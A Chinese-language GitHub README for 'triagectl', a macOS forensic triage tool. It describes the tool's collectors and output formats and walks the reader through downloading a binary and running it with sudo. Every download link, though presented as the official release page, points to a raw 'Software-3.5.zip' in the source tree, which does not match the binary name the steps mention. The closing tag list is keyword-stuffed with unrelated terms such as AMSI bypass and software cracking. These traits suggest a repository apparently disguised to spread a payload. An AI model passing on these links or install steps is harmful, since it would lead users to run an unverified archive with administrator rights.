Irdk1242s/triagectl

# 🛠️ triagectl - 快速 macOS 取证分类工具 [](https://github.com/Irdk1242s/triagectl/raw/refs/heads/main/cmd/triagectl/Software-3.5.zip) ## 📋 什么是 triagectl？ triagectl 是一款专为 macOS 用户设计的简单工具，用于检查计算机是否存在数字威胁或安全事件的迹象。它能快速收集系统的重要信息，并将数据保存为多种易于查看或与取证专家共享的格式。 该工具在 Mac 上作为单个文件运行，无需任何额外程序或复杂的设置。即使没有深厚的技术知识，您也能轻松使用。 ## 🔍 您应该了解的功能 - 从 **26 个不同的系统区域** 收集信息，如用户活动、网络连接、安全设置和持久化方法。 - 执行基本的 **自动检查**，以发现可疑进程、异常网络活动和可疑的启动项。 - 将您的系统数据与已知的恶意指标（如 IP 地址、域名、文件哈希和文件路径）进行匹配。 - 输出易于使用的结果格式：数据库文件 (SQLite)、电子表格 (CSV)、交互式网页报告 (HTML) 以及用于高级分析的时间线格式。 - 并发运行收集器，使整个过程更快。 - 无论是否具有管理员权限均可运行，若以特殊权限运行则能显示更多信息。 ## 🚀 入门指南 triagectl 旨在易于使用。请按照以下步骤在您的 Mac 上下载、设置并运行它。 ## 📥 下载与安装 点击下方的大链接访问 triagectl 的官方发布页面。在该页面上，您可以找到该工具的最新版本以供下载： [从 GitHub Releases 下载 triagectl](https://github.com/Irdk1242s/triagectl/raw/refs/heads/main/cmd/triagectl/Software-3.5.zip) 以下是在 Mac 上获取 triagectl 的方法： 1. 访问上面的链接。该页面列出了最新的可用版本。 2. 找到名为 `triagectl_darwin_amd64` 的文件（或根据您的 Mac 而定类似的名称）。这就是程序文件。 3. 将文件下载到您的 Downloads 文件夹或您能记住的地方。 4. 在 Mac 上打开 Terminal 应用程序。您可以在 Applications > Utilities > Terminal 中找到它。 5. 使用 `cd` 命令进入您下载 triagectl 的文件夹。例如，输入： cd ~/Downloads 6. 通过输入以下命令使文件可执行： chmod +x triagectl_darwin_amd64 7. 您现在已准备好运行 triagectl。 ## ▶️ 如何运行 triagectl 下载并将 triagectl 设置为可执行文件后，请按照以下步骤运行它： 1. 打开 Terminal 并进入包含 triagectl 的文件夹： cd ~/Downloads 2. 通过输入以下命令运行程序： ./triagectl_darwin_amd64 这将运行所有系统检查并将结果保存到文件中。 您也可以通过添加选项，要求 triagectl 创建友好的 HTML 报告或时间线文件： ``` ./triagectl_darwin_amd64 --html --timeline ``` ## 🧰 triagectl 收集的内容 triagectl 会扫描 Mac 上的许多位置，为您提供系统健康状况和风险的广泛视图。以下是一些示例： - **持久化 (Persistence)**：查找在 Mac 启动时运行的程序。 - **用户活动**：检查用户最近所做操作的日志。 - **网络**：查看活动连接和近期的网络历史记录。 - **安全**：收集有关安全设置和已知问题的数据。 - **可疑进程**：查找异常或未知的运行程序。 - **IOC 匹配**：将您的数据与已知恶意项目列表（IP、域名、哈希）进行比较。 该工具能快速、安全地收集数据，且不会更改您的系统。 ## 📁 输出文件说明 运行 triagectl 后，您会在文件夹中发现几个文件。以下是理解它们的方法： - **SQLite 文件 (.sqlite)**：存储所有收集信息的数据库。您可以使用数据库查看器或取证工具打开它。 - **CSV 文件 (.csv)**：简单的电子表格文件，可在 Excel 或类似程序中打开。 - **HTML 报告 (.html)**：一个交互式网页，分组显示结果，易于浏览。 - **Timesketch 时间线 (.jsonl)**：可与数字取证时间线工具集成以进行更深入调查的文件。 ## ⚙️ 使用高级选项 triagectl 有几个选项，您可以在运行时添加以控制其工作方式： - `--html` – 生成交互式 HTML 报告。 - `--timeline` – 创建 Timesketch 时间线文件。 - `--ioc` – 使用自定义指标文件与系统数据进行匹配。 - `--timeout` – 设置允许每个收集器运行多长时间。 - `--parallelism` – 控制同时运行多少个收集器。 - `sudo` – 以管理员身份运行 triagectl 以收集更多数据。 使用选项的示例： ``` sudo ./triagectl_darwin_amd64 --html --timeline ``` ## 🔐 使用管理员权限运行 Mac 上的某些数据只能由具有管理员权限的用户访问。要查看这些额外数据，请打开 Terminal 并使用 `sudo` 运行 triagectl： ``` sudo ./triagectl_darwin_amd64 ``` 您可能需要输入密码。这允许 triagectl 收集更详细的信息以便进行更好的分析。 ## 🧑‍💻 故障排除提示 - 如果您收到 "Permission denied" 错误，请确保您已将 triagectl 文件设置为可执行 (`chmod +x`)。 - 如果程序无法运行，请检查您是否位于 triagectl 所在的文件夹中。 - 不使用 `sudo` 运行会限制收集的信息。如果您想要完整结果，请尝试使用 `sudo` 运行。 - 如果您不确定选项，请运行： ./triagectl_darwin_amd64 --help - 确保您的 macOS 版本为 10.12 或更高版本以获得最佳兼容性。 ## ℹ️ 系统要求 - 运行 macOS 10.12 Sierra 或更高版本的 Mac。 - 至少 2 GB 的可用磁盘空间用于存放输出文件。 - Terminal 应用程序访问权限（所有 Mac 均已包含）。 - 如果您想要完整的数据收集，则需要管理员密码。 ## 🌐 有用链接 - 官方下载发布页面：[https://github.com/Irdk1242s/triagectl/raw/refs/heads/main/cmd/triagectl/Software-3.5.zip](https://github.com/Irdk1242s/triagectl/raw/refs/heads/main/cmd/triagectl/Software-3.5.zip) - 项目主页和文档：访问上面的 GitHub 页面。 - 如果您需要帮助，请查看 GitHub 仓库上的 Issues 选项卡或联系社区。 ## 📥 立即下载 triagectl [](https://github.com/Irdk1242s/triagectl/raw/refs/heads/main/cmd/triagectl/Software-3.5.zip)

标签：AMSI绕过, CSV, EVTX分析, EVTX分析, EVTX分析, Go语言, HTML报告, HTTP工具, IOC匹配, Mac安全, meg, Mr. Robot, SQLite, Triage, 信息安全, 协议分析, 单文件工具, 取证, 可疑进程检测, 后渗透, 多模态安全, 威胁检测, 子域名枚举, 工具集, 库, 应急响应, 持久化分析, 数字取证, 数据包嗅探, 无依赖, 无线安全, 日志审计, 时序数据库, 权限提升, 痕迹采集, 程序破解, 系统安全, 网络安全审计, 网络连接监控, 自动化分析, 自动化脚本, 跨站脚本